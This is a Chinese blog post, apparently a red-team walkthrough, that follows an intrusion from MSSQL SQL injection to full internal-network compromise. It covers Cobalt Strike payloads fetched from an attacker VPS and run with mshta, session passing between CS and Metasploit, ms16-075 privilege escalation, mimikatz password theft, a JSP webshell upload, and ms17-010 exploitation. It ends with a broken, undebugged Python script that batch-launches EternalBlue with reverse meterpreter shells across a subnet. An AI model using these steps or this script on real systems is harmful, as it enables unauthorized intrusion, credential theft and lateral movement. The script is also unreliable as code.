msf实战提权windows_技术干货| 实战分享:从sql注入到内网漫游

最新推荐文章于 2024-07-21 00:00:58 发布
最新推荐文章于 2024-07-21 00:00:58 发布
阅读量775 收藏 2
点赞数 1
文章标签: msf实战提权windows sql进程意外终止 windows执行sql脚本

欢迎各位添加微信号:qinchang_198231  

 加入安全+ 交流群 和大佬们一起交流安全技术

以下内容与测试工具仅限技术交流,严禁用于非法攻击

对于红队队员来说,打点之后最重要的就是横向的内网渗透了,但很多人都卡在了这一步,今天这篇文章就主要讲一讲cobaltstrike和msf的联动,内网渗透的一些小思路,以及我遇到的一些msf和cs的坑

0X01从SQL注入到CS上线

SQL注入方面就不详细赘述了,相信大家都很了解,目标站存在一个POST型的注入,且为SA用户,MSSQL的数据库,所以我们呢就可以直接进行--OS-SHELL90085561c7e79b7ecb65b75607efb3ac.png

我们先在cs建立一个监听,这里我选用的payload是Windows/beacon_http/reverse_http,host填写vps地址,端口随便定义

17be6e49c3a960ee05a480ff01554753.png

下一步就是生成一个HTML木马,ATTacks-packages-HTML我们选择刚才新建的那个监听,然后选择方法powershell

10727171faedbc641a66927e3537154c.png

之后就是选择你刚刚生成的木马,在你的vps上建立一个下载链接

6c4b44894b5adb336e37c9178691e28b.png

在目标机器上通过mshta执行

53a631b9c0bc3ec6be52fb10c6663f3a.png

然后这时候我们就会看到我们的CS里多出了一个目标

6cffb3b27e9340d7f7c6a159ce372fea.png

但是这个时候我们发现这个机器的权限是MSSQLSERVER,这对于我们来说是远远不够的,这个时候我们就要进行提权操作,CS中自带了几个提权的脚本,你也可以通过插件来获取其他提权脚本,但是我用CS的脚本进行提权都以失败告终,所以我需要把这个session传输到MSF里面

0X02CS和MSF的session的互传

这一步是走向内网的第一步,也可以说是打点渗透的最后一步,可以说是非常重要的了,我们首先需要在CS中建立一个全新的监听,以便于session的传输

147ebefe16c015f8cec03d0648cbd545.png

这个监听的payload要选择Windows/foreign/reverse_tcp,HOST填写你的vps,port随意

这里我的msf装在了vps上,所以我们打开vps,新建一个screen,运行msf,然后选择exploit/multi/handler之后我们设置payload,设置成和cs对应的如图所示

58931d4aac0784106dfb294a1ea10ad8.png

之后就是设置LHOST和LPORT,由于我的CS监听设置的地址就是vps的地址,所以我们在vps上监听0.0.0.0就可以,然后lport写刚刚你在cs上设置的port,一切设置完成我们先在msf上run起来,之后在cs上选择刚刚上线的机器,在beaconshell中输入spawn+刚刚你设置的msf监听名字就可以了,过一会儿我们就能看到msf中有机器上线

8bffda8c895aeb2017ae773a6b650262.png

下一步就是利用msf提权,这里我们先把这个session放到后台,用bg命令就可以

62ad4c28b37da29117d81b4c1016236d.png

之后我们用这个插件 post/multi/recon/local_exploit_suggester,进去之后我们set session * *就是刚刚你msf监听到的那个session的序号,这个插件就会自动检测目标系统版本以及可以利用的提权脚本,我们运行一下试试

9ec7667f723f00446c11188fe3b62529.png

可以看到,这些脚本就是可用的,这里我用了最后一个ms16-075这个漏洞

bbeaa415b24f63059e73315a6a5a4100.png

可以看到,提权成功,返回了一个新的system权限的session,下面我们尝试通过msf把这个session注入回到cs中

使用exploit/windows/local/payload_inject

把payload设置成我们cs建立的第一个监听的payload即windows/meterpreter/reverse_http

然后设置host,port以及要传回去的session

run

03ec430244ce69e26eddc65ed87ca1a4.png

我们可以看到CS上返回了一个system权限的shell

6c80c521288a8a7bff841bbceefae52e.png

这个时候我们就可以愉快的使用mimikatz等工具来把administrator的密码偷来

但是有的机器改了RDP服务的端口怎么办呢,我们可以用cs的进程管理,找到rdp服务的PID,然后在beacon中输入powershell netstat -ano,就可以找到这个PID对应的端口了

d1d3bf1643a647d91856ce543c6072ab.png

f67f13d70b7c7fc973bd2c50ffdcb09e.png

0X03内网渗透的一些思路

我们拿到了一台机器,如何进行下一步的内网嗅探呢,cs中自带了一个portscan,当然你也可以通过socks把nmap,msf之类的带入到内网,这里我们就用cs自带的工具

我们可以看到他的内网比较简单,我进去转了一圈发现也只有一些打印机,路由器,还有一个oracle,我们通过受害机的浏览器中保存的密码进入到了其中,新建项目即可传war包,上传jsp木马,还有就是剩下几台445的windows主机了,由于我比较懒,就不把msf带入了,直接传一个ms17010的利用工具

8b420f90e8b90a5adcc4da885e4c47cf.png

至此,内网全部主机沦陷,打完收工,内网方面错综复杂,大家可以注意一些未授权访问啊,弱口令啊,浏览器保存的密码啊,整理出属于这个网段的密码字典,然后密码复用,细心总会有意外惊喜

最后,贴上一个自己写的ms17010批量工具,是刚刚利用的时候突发奇想写的,还没调试,希望各位大佬不要笑话,有时间帮小弟调试修改一下,在这里给大家磕头了cbe9cdb922f549081932f8a3c4b72f29.pngcbe9cdb922f549081932f8a3c4b72f29.pngcbe9cdb922f549081932f8a3c4b72f29.png

import sysimport osfor a in range (0,256):    a = str(a)    ip = "xx.xx.xx.""+a+"    def ms(config):        config=open('ms17010.rc','w')        config.write('use exploit/windows/smb/ms17_010_eternalblue'+"\n")        config.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp'+"\n")        config.write('set RHOST '+ip+"\n")        config.write('set LHOST "445"\n')        config.write('exploit'+"\n")    ms('')def main():    mg=os.system('msfconsole -r /root/ms17010.rc')if __name__ == '__main__':    main()

7d1f6abaac649e5363deeb71f9e07287.png

7d2abaaa32179011fbeb00454a49522e.png

7fd29114816a934a50895a2f0d10160e.png

weixin_39828198
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf实战提权windows_推荐一个渗透测试实战平台
weixin_39794130的博客
11-21 326
原创: kid 合天智汇18年毕业,目前某安全公司PM搬砖,但依然钟情于渗透,希望能通过学习不断提高自己的技术。因为一开始研究的是渗透,但还是太菜。大佬师傅当小说看就好。目前实战操作来源vunlhub及handthebox,均须爬楼,我是自己搭的楼梯。Guge和油管以及推特都是很好的平台,油管上太多牛逼的人。。。CTF也会偶尔看,如果有师傅带着玩和打比赛,愿意跟着搬砖打杂。。靶机下载地址:http...
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1924
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Metasploit框架中的exploit/multi/handler和exploit/windows/local/payload_inject
最新发布
m0_63082628的博客
07-21 615
因此,exploit/windows/local/payload_inject 和 exploit/multi/handler 在 Metasploit 中扮演着不同的角色,前者更多地涉及在目标系统上的本地操作,后者则侧重于建立远程控制会话。在Metasploit框架中使用exploit/multi/handler模块,是用来接收来自目标系统的反向shell连接,通常是在已经成功利用某个漏洞并植入了Meterpreter shell或者执行了其他形式的代码之后的操作。将生成的payload上传到目标系统。
msf实战提权windows_SqlServer提权
weixin_39677538的博客
11-21 603
前话:其实SqlServer的提权与Mysql的UDF提权是一个道理,当我们拿到webshell后,权限太低无法使用常规的系统漏洞进行提权时,如果恰好数据库服务的运行权限较高,例如是个系统权限(通常sqlserver2000和2008安装后默认权限是系统权限),则我们可以通过sqlserver提权,让自己以同数据库服务一样的系统权限进行命令执行。而如果是直接拿到了数据库,而不是通...
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1951
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
黑客笔记:记一次sql注入内网漫游
QIANDXX的博客
01-06 565
对于红队队员来说,打点之后最重要的就是横向的内网渗透了。
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
创毅视讯(CMMB)是中国移动多媒体广播标准下的一个关键硬件和软件...尽管随着技术的发展,现在有更多的选择来接收和播放移动电视,但创毅视讯的这款软件在当时是一个重要的里程碑,为CMMB在中国的普及起到了关键作用。
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
技术分享】恶意框架样本分析-从Veil到Msf .pdf
09-05
技术分享】恶意框架样本分析-从Veil到Msf 渗透测试是网络安全领域中一项重要的实践,旨在发现并修复组织的安全漏洞。本篇技术分享将深入探讨两个常用的恶意框架——Veil和Metasploit(Msf),以及它们在安全测试...
070-浅谈SQL Server从DBO用户提权到DBA的两种思路.pdf
09-20
在本文档中,我们主要探讨了在SQL Server数据库中,从DBO(Database Owner,数据库所有者)用户提权到DBA(Database Administrator,数据库管理员)的两种思路。这两种思路分别依赖于“可信数据库”和“允许用户角色...
第二十八课:基于MSF发现内网存活主机第六季1
08-03
本篇将详细介绍MSF中用于发现内网存活主机的多个扫描模块。 首先,我们来看第一季介绍的五个模块: 1. `auxiliary/scanner/discovery/arp_sweep`:这个模块通过发送ARP请求来探测网络中的主机。ARP(地址解析协议...
msf生成webshell_用metasploit来生成Powershell后门
weixin_39959615的博客
12-22 1316
在Kali的shell中配置一个Powershell后门,针对WindowsPowershell所设计。root@kali:~# msfconsolemsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_de...
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
无业de小白的博客
05-07 398
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6346
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
第72天-内网安全-域横向 CS&MSF 联动及应急响应初
MCTSOG的博客
04-27 2738
思维导图 内网渗透 待续 应急响应 演示案例: MSF&CobaltStrike 联动 Shell (待续) 应急响应 攻击者可能拿到了哪些权限,攻击可能发生在哪个部分,从最可能的开始排查 可疑文件看文件有没有毒,有没有外部链接 结合攻击指搭建平台的漏洞 WEB 攻击应急响应朔源-后门,日志 故事回顾:某客户反应自己的网站首页出现篡改,请求支援 分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析 思路2
ONE DAY |网络安全渗透测试之跨网段攻击
EverUP
05-04 2109
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4069
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上cs和msf 将cs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
红日靶场--内网渗透练习
Nailaoyyds的博客
04-21 3767
环境介绍: 内网 kali 192.168.171.137 win7 192.168.171.153 192.168.52.130 win2003 192.168.52.131 win2008 192.168.52.138 信息收集 内网主机存...
MSF实现远程渗透
WFC1006848997的博客
01-12 2572
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值